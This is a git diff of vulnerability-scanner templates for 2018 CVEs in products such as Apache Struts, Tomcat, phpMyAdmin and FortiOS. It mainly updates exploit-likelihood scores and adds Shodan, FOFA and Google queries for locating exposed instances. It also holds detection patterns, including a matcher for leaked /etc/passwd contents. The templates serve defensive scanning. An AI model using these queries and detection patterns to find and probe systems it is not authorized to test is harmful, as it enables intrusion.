cvss-score: 6.1 cve-id: CVE-2018-11473 cwe-id: CWE-79 - epss-score: 0.00097 - epss-percentile: 0.39534 + epss-score: 0.001 + epss-percentile: 0.4118 cpe: cpe:2.3:a:monstra:monstra:3.0.4:*:*:*:*:*:*:* metadata: verified: true @@ -29,6 +29,7 @@ info: vendor: monstra product: monstra shodan-query: http.favicon.hash:419828698 + fofa-query: icon_hash=419828698 tags: cve,cve2018,xss,mostra,mostracms,cms,monstra http: @@ -70,4 +71,4 @@ http: - 'id="csrf" name="csrf" value="(.*)">' internal: true part: body -# digest: 490a004630440220740d343390daffdaa2e4889d6c8f3c60262ea0f8dfefa267015b150d60eb9c46022072f2d72c1ca4e16ec3ce633cf0ad2ae4a154180871ea90d771a74a50410a9bfb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022036c1c6320032b7d766da8547f80ca65da333066602f3c266752775429737766e022100df63b38dfd53ec3807a099db7b983469085a94bc866637ce7a4da3a1f8c7137a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-11709.yaml b/http/cves/2018/CVE-2018-11709.yaml index 5deb50899a..4975a82ea5 100644 --- a/http/cves/2018/CVE-2018-11709.yaml +++ b/http/cves/2018/CVE-2018-11709.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2018-11709 cwe-id: CWE-79 - epss-score: 0.00175 - epss-percentile: 0.53725 + epss-score: 0.00183 + epss-percentile: 0.55455 cpe: cpe:2.3:a:gvectors:wpforo_forum:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022020b9433d2689cd1c916656c6593704d52cdc82d3cae348cb23bbd6b903fa6e4102210093789a3005ae04750511962961e6ce2b78f9e2bdb3cd2d6871867fa439c29424:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207421366c244f2a469b78e683d33433ea6d7c8268abf6e0e8090bbfb449d240d202203fdb385d1e1838f118286e940d02d935d99b18bc9ab0657fd3edcf1210203932:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-11759.yaml b/http/cves/2018/CVE-2018-11759.yaml index 4146114bce..8f83a17a36 100644 --- a/http/cves/2018/CVE-2018-11759.yaml +++ b/http/cves/2018/CVE-2018-11759.yaml @@ -28,7 +28,11 @@ info: max-request: 2 vendor: apache product: tomcat_jk_connector - shodan-query: title:"Apache Tomcat" + shodan-query: + - title:"Apache Tomcat" + - http.title:"apache tomcat" + fofa-query: title="apache tomcat" + google-query: intitle:"apache tomcat" tags: cve2018,cve,apache,tomcat,httpd,mod-jk http: @@ -46,4 +50,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022041afb53374b858558cfa721e985551966ce7288cec93b493945ea139d7386f8402205f4e5b293d6960714f5f73b027b4e94ae9e1807296b861ed9b23392772a3be60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022078ef3f356bb7097bb620df80a7fc341078b1a4f2117f493c2e2c4150bfab89a302205caf2b18b096d8dc91b9428af9f345f46ee58283a27eeed1c8367f23da554740:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-11776.yaml b/http/cves/2018/CVE-2018-11776.yaml index 540b9f8c3d..5e0d938ced 100644 --- a/http/cves/2018/CVE-2018-11776.yaml +++ b/http/cves/2018/CVE-2018-11776.yaml @@ -22,12 +22,21 @@ info: cve-id: CVE-2018-11776 cwe-id: CWE-20 epss-score: 0.97517 - epss-percentile: 0.99985 + epss-percentile: 0.99987 cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apache product: struts + shodan-query: + - http.html:"apache struts" + - http.title:"struts2 showcase" + - http.html:"struts problem report" + fofa-query: + - body="struts problem report" + - title="struts2 showcase" + - body="apache struts" + google-query: intitle:"struts2 showcase" tags: cve,cve2018,packetstorm,apache,rce,struts,kev http: @@ -44,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ab1c51e0504628fe004acf4adeb03221ca6e19060ece841c357bd983b6d698760221009d5e783a014ec2025efc6cb4589970bba73805b98312143cd27a9ac719bdee2c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204e0ee62566aa3e91a90c466211aa77cf3a7faaaf61c04dfb6ad080cfb73ada5f022100c6938323746d6dd5404d2d7c439359379d43c2d3bb98737132e3da382864c3df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-11784.yaml b/http/cves/2018/CVE-2018-11784.yaml index a39a136872..a57262a0cc 100644 --- a/http/cves/2018/CVE-2018-11784.yaml +++ b/http/cves/2018/CVE-2018-11784.yaml @@ -21,14 +21,22 @@ info: cvss-score: 4.3 cve-id: CVE-2018-11784 cwe-id: CWE-601 - epss-score: 0.83718 - epss-percentile: 0.98183 + epss-score: 0.79069 + epss-percentile: 0.9827 cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apache product: tomcat - shodan-query: title:"Apache Tomcat" + shodan-query: + - title:"Apache Tomcat" + - http.title:"apache tomcat" + - http.html:"apache tomcat" + - cpe:"cpe:2.3:a:apache:tomcat" + fofa-query: + - body="apache tomcat" + - title="apache tomcat" + google-query: intitle:"apache tomcat" tags: cve,cve2018,packetstorm,tomcat,redirect,apache http: @@ -47,4 +55,4 @@ http: negative: true status: - 404 -# digest: 4a0a00473045022056187efc1263a71f2d8b32f9de3c5f204e1f0e14a74e5c6414adcc71e2baef0f022100c535f4d342896061392e41c1198b95e62d3934b01628ac2a8a8bfdd16547d8ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a5a5cfa4004a415eeeaf23af29dcff242e7a9064703e9faf951ed3377abec6b00221008f9195e6ee86a3df9eb2828a8b387f0fe801d7c36c0d3c9e74e41a0aa487bc38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-12031.yaml b/http/cves/2018/CVE-2018-12031.yaml index d054420772..20be64b068 100644 --- a/http/cves/2018/CVE-2018-12031.yaml +++ b/http/cves/2018/CVE-2018-12031.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2018-12031 cwe-id: CWE-22 - epss-score: 0.00725 - epss-percentile: 0.80248 + epss-score: 0.02759 + epss-percentile: 0.90576 cpe: cpe:2.3:a:eaton:intelligent_power_manager:1.6:*:*:*:*:*:*:* metadata: max-request: 2 @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ab34469cfcefff232919bd56d0ecb10087647817db9eba51fae678e7630e51e002202f79da64c606d1225444596f885702817709284e378c496818f3ee1144ce6188:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fa5f6c95e56ff7e46e8bb58d0cf8c30e0a6788c3a1378618619c2e0a8c7ae11902201bd725976214247dc0fecb41fc5b6e3213a728cbee903a11d4945a7de4f4404d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-12054.yaml b/http/cves/2018/CVE-2018-12054.yaml index 22feebf055..8bb2205c18 100644 --- a/http/cves/2018/CVE-2018-12054.yaml +++ b/http/cves/2018/CVE-2018-12054.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2018-12054 cwe-id: CWE-22 - epss-score: 0.36029 - epss-percentile: 0.9677 + epss-score: 0.32403 + epss-percentile: 0.97019 cpe: cpe:2.3:a:schools_alert_management_script_project:schools_alert_management_script:-:*:*:*:*:*:*:* metadata: max-request: 1 @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100909d49cf51c1283f77ba2b94390ec551a381726ad24bc74122062cdf6ef9d80d02206aa868f2e0d240bebc71f4ce6fca02e97592a2b0c377d466545fb0b3d1cb715d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044021f7bec975f3d095b3baddab7451dd34b90e0a36439d9bbb935d16af9b93fbc7a022100bdc1c62317a0b6eb0312f2df343eba874357e16e348a245794912b81b984aed3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-12296.yaml b/http/cves/2018/CVE-2018-12296.yaml index 917c709de5..faed61d456 100644 --- a/http/cves/2018/CVE-2018-12296.yaml +++ b/http/cves/2018/CVE-2018-12296.yaml @@ -19,12 +19,15 @@ info: cve-id: CVE-2018-12296 cwe-id: CWE-732 epss-score: 0.01442 - epss-percentile: 0.86338 + epss-percentile: 0.866 cpe: cpe:2.3:o:seagate:nas_os:4.3.15.1:*:*:*:*:*:*:* metadata: max-request: 1 vendor: seagate product: nas_os + shodan-query: http.title:"seagate nas - seagate" + fofa-query: title="seagate nas - seagate" + google-query: intitle:"seagate nas - seagate" tags: cve,cve2018,seagate,nasos,disclosure,unauth http: @@ -48,4 +51,4 @@ http: regex: - '"version": "([0-9.]+)"' part: body -# digest: 4a0a00473045022060c783658faf40b7f9a34361eed36da0f94e1675b8f33ff246b9f4aeb1fb5154022100c74444ed55f597dff4be9289ccea933ff13cd951323438b922cd89b639507c63:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c86c7844f9443c6b8d293926410ce41785db4ef5c6b98043f30213d9bbb9270a022070c2af8ad6d2d241e8f1fef3587bcf19840745117be2ff717086e32217b3849f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-12300.yaml b/http/cves/2018/CVE-2018-12300.yaml index 94384ca163..2a6238d209 100644 --- a/http/cves/2018/CVE-2018-12300.yaml +++ b/http/cves/2018/CVE-2018-12300.yaml @@ -24,6 +24,9 @@ info: max-request: 1 vendor: seagate product: nas_os + shodan-query: http.title:"seagate nas - seagate" + fofa-query: title="seagate nas - seagate" + google-query: intitle:"seagate nas - seagate" tags: cve2018,cve,redirect,seagate,nasos http: @@ -36,4 +39,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4a0a00473045022100b3dfe85d30990abdfc76926f79fc0972052a3bf24374013a6ed622a5fac500f402202ad50a628af7526e0eca73ed3a88133d9c9e4962c830fcc5b7e868563bedb40e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009dfce0d02b5695b72b5abb8cf9079405d12ade3adcfc1c5bb25e4b725d8926ee02202fa0abf4ea932a109e72c5a67f552de24aa8c6fe91c634debed351d5be5d2e64:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-12613.yaml b/http/cves/2018/CVE-2018-12613.yaml index 5a32b4c999..db7f2489f4 100644 --- a/http/cves/2018/CVE-2018-12613.yaml +++ b/http/cves/2018/CVE-2018-12613.yaml @@ -20,13 +20,22 @@ info: cvss-score: 8.8 cve-id: CVE-2018-12613 cwe-id: CWE-287 - epss-score: 0.97392 - epss-percentile: 0.99908 + epss-score: 0.97369 + epss-percentile: 0.99902 cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: phpmyadmin product: phpmyadmin + shodan-query: + - http.title:"phpmyadmin" + - http.component:"phpmyadmin" + - cpe:"cpe:2.3:a:phpmyadmin:phpmyadmin" + fofa-query: + - title="phpmyadmin" + - body="pma_servername" && body="4.8.4" + google-query: intitle:"phpmyadmin" + hunter-query: app.name="phpmyadmin"&&web.body="pma_servername"&&web.body="4.8.4" tags: cve,cve2018,vulhub,edb,phpmyadmin,lfi http: @@ -44,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009efa0514463053230c63b5f90705314d9e80a1a472ea48bb9da85b5c9779ee6402206c0ec7976f0ef1416debde9235f1b2a274324bd6782667980cd9288d6c90b06b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f505a7118be2d4ae5593402023b00539877c2bb9960c839d4af1ec8592d32d2a022100898f6687654b47ef6180a79614cbcd4b65fbb57885be19a59e281e33b6e8002d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-12634.yaml b/http/cves/2018/CVE-2018-12634.yaml index d6edb3744c..0c32cd9593 100644 --- a/http/cves/2018/CVE-2018-12634.yaml +++ b/http/cves/2018/CVE-2018-12634.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2018-12634 cwe-id: CWE-200 - epss-score: 0.95531 - epss-percentile: 0.99245 + epss-score: 0.94448 + epss-percentile: 0.99209 cpe: cpe:2.3:a:circontrol:circarlife_scada:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ed0b29ad551cb1c8046e44ccfeb468882574d4d84131408c68bd1df5afd26cfa022075bd7e7320c9c33dad093dd40822990e12fc84791e76510619255948ce4ba1cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022070d438b8deca8262b388a1ac84d7a28612a28f7eb0ec72da39762e02a9ab2c6e02205bdbf452ac32f90703c55fbb539c9a91679e39359fcbaf302d82948f56a6b57b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-12675.yaml b/http/cves/2018/CVE-2018-12675.yaml index 52e4353249..7c9a0a106d 100644 --- a/http/cves/2018/CVE-2018-12675.yaml +++ b/http/cves/2018/CVE-2018-12675.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2018-12675 cwe-id: CWE-601 epss-score: 0.00118 - epss-percentile: 0.44971 + epss-percentile: 0.45948 cpe: cpe:2.3:o:sv3c:h.264_poe_ip_camera_firmware:v2.3.4.2103-s50-ntd-b20170508b:*:*:*:*:*:*:* metadata: verified: true @@ -41,4 +41,4 @@ http: part: body words: - '' -# digest: 4a0a00473045022100fe1e9de738122538a2449b660acfbadd5b2f6e95f978b4fd052467bb4f222c1b022077728b007829328b0aa238c9635a5106d04c04ef695ec1557e91b4b5b46cb70f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f687e998ebd40e7f6e0cd7750ccdc2f8cd832181f93aa0404dd46ea313b3754502200c2cbb0e94b7ac91d20cd6904518d07f26788a7f5ba5f1318552e687577c3e37:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-1271.yaml b/http/cves/2018/CVE-2018-1271.yaml index 0842786335..82fa5984d6 100644 --- a/http/cves/2018/CVE-2018-1271.yaml +++ b/http/cves/2018/CVE-2018-1271.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-1271 cwe-id: CWE-22 epss-score: 0.004 - epss-percentile: 0.73113 + epss-percentile: 0.73504 cpe: cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:* metadata: max-request: 2 @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022029c3380bdfd5118230de31f228fa1f4e5f2888d9bd277fe8ac5d3a84562a79f5022036b5eb64e2ed0675f3fc8179c9692ed6a466c35c7e8f0af65d4256edaec216c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f8dc70bf72aa6d2c7fbe2e2c55aff27c85410de59599fde3c1e37aa7ca9e354202206242c50d362c74213733b6b42877aadf4cc58cbb8aaf1d5b615b051ca566a2a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-1273.yaml b/http/cves/2018/CVE-2018-1273.yaml index 792a5d855d..2680087e63 100644 --- a/http/cves/2018/CVE-2018-1273.yaml +++ b/http/cves/2018/CVE-2018-1273.yaml @@ -26,8 +26,8 @@ info: cvss-score: 9.8 cve-id: CVE-2018-1273 cwe-id: CWE-20,CWE-94 - epss-score: 0.97515 - epss-percentile: 0.99982 + epss-score: 0.97466 + epss-percentile: 0.99962 cpe: cpe:2.3:a:pivotal_software:spring_data_commons:*:*:*:*:*:*:*:* metadata: max-request: 2 @@ -56,4 +56,4 @@ http: - "root:.*:0:0:" - "\\[(font|extension|file)s\\]" condition: or -# digest: 4b0a00483046022100c4cebff0a87b2c4dac5a4d920694980041be72b0635587ca09347a4ef052fefe0221008e29bc099fb5b574cb1c5876f58f5bcbca1c78a5bbe2f82982b9d628b1dac77f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ea11936820b9f4529c8d99962cbc5e7b64e6a1eb2cbe4c1a4b08a7cc5f7c77b102204e8853c9bec62fe0cc9168ee13029ab92b5d931f8e2917827d23227c014eda74:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-12909.yaml b/http/cves/2018/CVE-2018-12909.yaml index 9092672f1f..e9c679b43f 100644 --- a/http/cves/2018/CVE-2018-12909.yaml +++ b/http/cves/2018/CVE-2018-12909.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: webgrind_project product: webgrind - fofa-query: app="Webgrind" + fofa-query: + - app="Webgrind" + - app="webgrind" tags: cve,cve2018,lfi,webgrind,webgrind_project http: @@ -47,4 +49,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022039cf28a7d017785e7ae6c8930010bd0a7a23aba9ba82336e80ce2a2202500afd02203e606922ed51c242bc1ee629aa166cd3bd867dc4704ca230d421533b72b9223b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210085a3bebbb5896b4c2395fef5f2ac88789d82f4b78af5460f89fd88905675e204022100d52075cf29d36c1c7db2d11c79ff00da19a5443e4474defc86e17ba20a9c36c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-1335.yaml b/http/cves/2018/CVE-2018-1335.yaml index ec75f3047f..7ccfefb35a 100644 --- a/http/cves/2018/CVE-2018-1335.yaml +++ b/http/cves/2018/CVE-2018-1335.yaml @@ -18,8 +18,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.1 cve-id: CVE-2018-1335 - epss-score: 0.96734 - epss-percentile: 0.99585 + epss-score: 0.96745 + epss-percentile: 0.99664 cpe: cpe:2.3:a:apache:tika:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100995e04bbc6df48317be210a749a2ac8a731b0e7bfa4d547e026075349e5190cc022100d0c88986a6df82ebc03e665d29d294e7d0ba57cdb72c09407727cee0689e6c0a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202e147e540018e89eb8892a229a98bbab99feca5c6f1416e246e0264aa28dd539022100c3f35f328d7fc8c2c5141f428a2585389f9262293b5bccb23bd929c7798c2374:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-13379.yaml b/http/cves/2018/CVE-2018-13379.yaml index 0cb4384d6f..21a39b4af8 100644 --- a/http/cves/2018/CVE-2018-13379.yaml +++ b/http/cves/2018/CVE-2018-13379.yaml @@ -26,7 +26,14 @@ info: max-request: 1 vendor: fortinet product: fortios - shodan-query: http.html:"/remote/login" "xxxxxxxx" + shodan-query: + - http.html:"/remote/login" "xxxxxxxx" + - http.favicon.hash:945408572 + - cpe:"cpe:2.3:o:fortinet:fortios" + - port:10443 http.favicon.hash:945408572 + fofa-query: + - body="/remote/login" "xxxxxxxx" + - icon_hash=945408572 tags: cve2018,cve,fortios,lfi,kev,fortinet http: @@ -39,4 +46,4 @@ http: part: body regex: - '^var fgt_lang =' -# digest: 4b0a00483046022100ed688fb687003137454ccb27e917dd0a47b6effc89bb9404707395186fce0efd0221008586aa2b87390aed0dd185af0e8a536f991a73de918ddcad55a7bc3acfdbc0fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206482ae29d2120aa7fa2f03b1c2d264568d1de71b049017f1b396a8237e3cd26502205f50509a64af57b118aa81d4dc221975d88602bde5b9038c06abd4a228ce9770:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-13380.yaml b/http/cves/2018/CVE-2018-13380.yaml index be4ef26f42..6ec2abffb3 100644 --- a/http/cves/2018/CVE-2018-13380.yaml +++ b/http/cves/2018/CVE-2018-13380.yaml @@ -21,12 +21,20 @@ info: cve-id: CVE-2018-13380 cwe-id: CWE-79 epss-score: 0.00122 - epss-percentile: 0.46406 + epss-percentile: 0.46539 cpe: cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: fortinet product: fortios + shodan-query: + - http.html:"/remote/login" "xxxxxxxx" + - http.favicon.hash:945408572 + - cpe:"cpe:2.3:o:fortinet:fortios" + - port:10443 http.favicon.hash:945408572 + fofa-query: + - body="/remote/login" "xxxxxxxx" + - icon_hash=945408572 tags: cve,cve2018,fortios,xss,fortinet http: @@ -53,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206ce45dc62265ae4f6192bec17dcdd2579840de84d6a70b1d94b162f3c44d36300221009e122123ca302b8c7791dae1933312958f9d3f1e0e89daf77aaa2b2dd224bd2f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022029dc84d25ce4c51efefde5778038b25b736e73529eb67248b55533fd8a5e718d022100a96094ddfdae1d6af8b3868728c61d8171a31105da21e93697618035febb60d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-13980.yaml b/http/cves/2018/CVE-2018-13980.yaml index cbd950e35d..413e751f73 100644 --- a/http/cves/2018/CVE-2018-13980.yaml +++ b/http/cves/2018/CVE-2018-13980.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-13980 cwe-id: CWE-22 epss-score: 0.0018 - epss-percentile: 0.5428 + epss-percentile: 0.55107 cpe: cpe:2.3:a:zeta-producer:zeta_producer:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220228e9d192f56704740750f3a51ad746dcfc7ca200431ce286c6b232e1803320e022100e58e67a71cef0a53f5d448ad997bd96cc2c3380c4a78a356c1af321cd3367885:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203224fda196eb1cbc81b68a79d58afaed6d9d7d9c8821fbcc463a6bc0e7295ad4022059cbe8295c4346847a37bf4a6db45ed614ead696931c35f803ddd046ee3c3c17:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-14013.yaml b/http/cves/2018/CVE-2018-14013.yaml index f6a55e3a22..15a5d5ea30 100644 --- a/http/cves/2018/CVE-2018-14013.yaml +++ b/http/cves/2018/CVE-2018-14013.yaml @@ -20,13 +20,22 @@ info: cvss-score: 6.1 cve-id: CVE-2018-14013 cwe-id: CWE-79 - epss-score: 0.00755 - epss-percentile: 0.80655 + epss-score: 0.0065 + epss-percentile: 0.7936 cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: synacor product: zimbra_collaboration_suite + shodan-query: + - http.title:"zimbra collaboration suite" + - http.title:"zimbra web client sign in" + fofa-query: + - title="zimbra web client sign in" + - title="zimbra collaboration suite" + google-query: + - intitle:"zimbra collaboration suite" + - intitle:"zimbra web client sign in" tags: cve,cve2018,xss,zimbra,synacor http: @@ -49,4 +58,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206f46ca25bae61a8c58a2d3c73103864b52d0333002e1c2422e184eef65e1321b022070c5d6a65e7a9734927fdd6fed6fedc1651f044f5268dd3a44c0d7550fb33f82:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203f452be815106a5b1344b236fe91f95275b51fe610e4b73693ce09db62eb4793022066f11fc599bbed0376f5ad47ee7bcc198e92a559577c3c374a6cd019f3b9e762:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-14064.yaml b/http/cves/2018/CVE-2018-14064.yaml index a521785628..4f600e373e 100644 --- a/http/cves/2018/CVE-2018-14064.yaml +++ b/http/cves/2018/CVE-2018-14064.yaml @@ -12,13 +12,14 @@ info: - https://www.exploit-db.com/exploits/45030 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14064 - https://medium.com/%40s1kr10s/velotismart-0day-ca5056bcdcac + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-14064 cwe-id: CWE-22 epss-score: 0.15741 - epss-percentile: 0.95409 + epss-percentile: 0.95931 cpe: cpe:2.3:o:velotismart_project:velotismart_wifi_firmware:b-380:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022063bdd1fe9b5c2d2aa2adee684558be85ff6671a613274c6e7a707fb69329681f022100d3107d95cef68cee1d04cac1bedee37ba1d5188c53813eb37ef9251229e9ea99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008514cf6c974cd4186414d7a81d17a4baec226b86cc88c968c4c5300859d00e0802201b2cd5397173847a6d3000d6aefb0514e8d0a01d4806a3c681306587a3e39cc8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-14474.yaml b/http/cves/2018/CVE-2018-14474.yaml index bf166bf6af..6f1620e74e 100644 --- a/http/cves/2018/CVE-2018-14474.yaml +++ b/http/cves/2018/CVE-2018-14474.yaml @@ -15,13 +15,14 @@ info: - https://seclists.org/fulldisclosure/2019/Jan/32 - https://vuldb.com/?id.122045 - https://nvd.nist.gov/vuln/detail/CVE-2018-14474 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2018-14474 cwe-id: CWE-601 - epss-score: 0.00068 - epss-percentile: 0.28116 + epss-score: 0.00063 + epss-percentile: 0.26641 cpe: cpe:2.3:a:goodoldweb:orange_forum:1.4.0:*:*:*:*:*:*:* metadata: max-request: 2 @@ -41,4 +42,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4b0a00483046022100f2adff2da944fbe9a1b29f662efd016ead45875d2e06992cd9e61e573f5877f4022100d08b0890924b7addb0673fc531f213922f2e4e23760f5dbca533566a40845382:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203794f97eb985e7b51a642cd485979e762edf2fa8b530829012c75ba4e3091830022100a2ffa6b6686a57dc714d016096bfc2ae7990e9e9d11a3514fa51cd92a05fe911:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-14574.yaml b/http/cves/2018/CVE-2018-14574.yaml index 4039ad5d78..8bde4688f3 100644 --- a/http/cves/2018/CVE-2018-14574.yaml +++ b/http/cves/2018/CVE-2018-14574.yaml @@ -21,13 +21,14 @@ info: cvss-score: 6.1 cve-id: CVE-2018-14574 cwe-id: CWE-601 - epss-score: 0.00828 - epss-percentile: 0.80126 + epss-score: 0.00628 + epss-percentile: 0.78964 cpe: cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: djangoproject product: django + shodan-query: cpe:"cpe:2.3:a:djangoproject:django" tags: cve,cve2018,django,redirect,djangoproject http: @@ -46,4 +47,4 @@ http: - type: status status: - 301 -# digest: 4b0a004830460221009caa5018de3f67f939a8bcb172921b8986a43ff83a2c7628413233ec2433c2af0221009d8028df2af32e3128aa06fe627e6d4c10fe49894f9539685a34e7f1a00e83ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bedaae748e6aaf48b9c690e95cc9f56486416f4d42f946b7db3201185738e9b8022100f1b531a7f5d0c01c6c14cb2238b20ca9ec8bb63947c1bef07d0adcd8f59cc6f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-14912.yaml b/http/cves/2018/CVE-2018-14912.yaml index 78b9b928bb..08f212b0c8 100644 --- a/http/cves/2018/CVE-2018-14912.yaml +++ b/http/cves/2018/CVE-2018-14912.yaml @@ -18,13 +18,16 @@ info: cvss-score: 7.5 cve-id: CVE-2018-14912 cwe-id: CWE-22 - epss-score: 0.96539 - epss-percentile: 0.99521 + epss-score: 0.96192 + epss-percentile: 0.99513 cpe: cpe:2.3:a:cgit_project:cgit:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: cgit_project product: cgit + shodan-query: http.title:"git repository browser" + fofa-query: title="git repository browser" + google-query: intitle:"git repository browser" tags: cve,cve2018,cgit,lfi,cgit_project http: @@ -41,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d6532de8059fab7fd78681f2120fb2a87cd3cb86792239d399ddefff43a1c3ac022100fcebf55316c2ace6c35b49754ffeb2a9ebe30f47a7b5437981e19da9b5545f82:922c64590222798bb761d5b6d8e72950 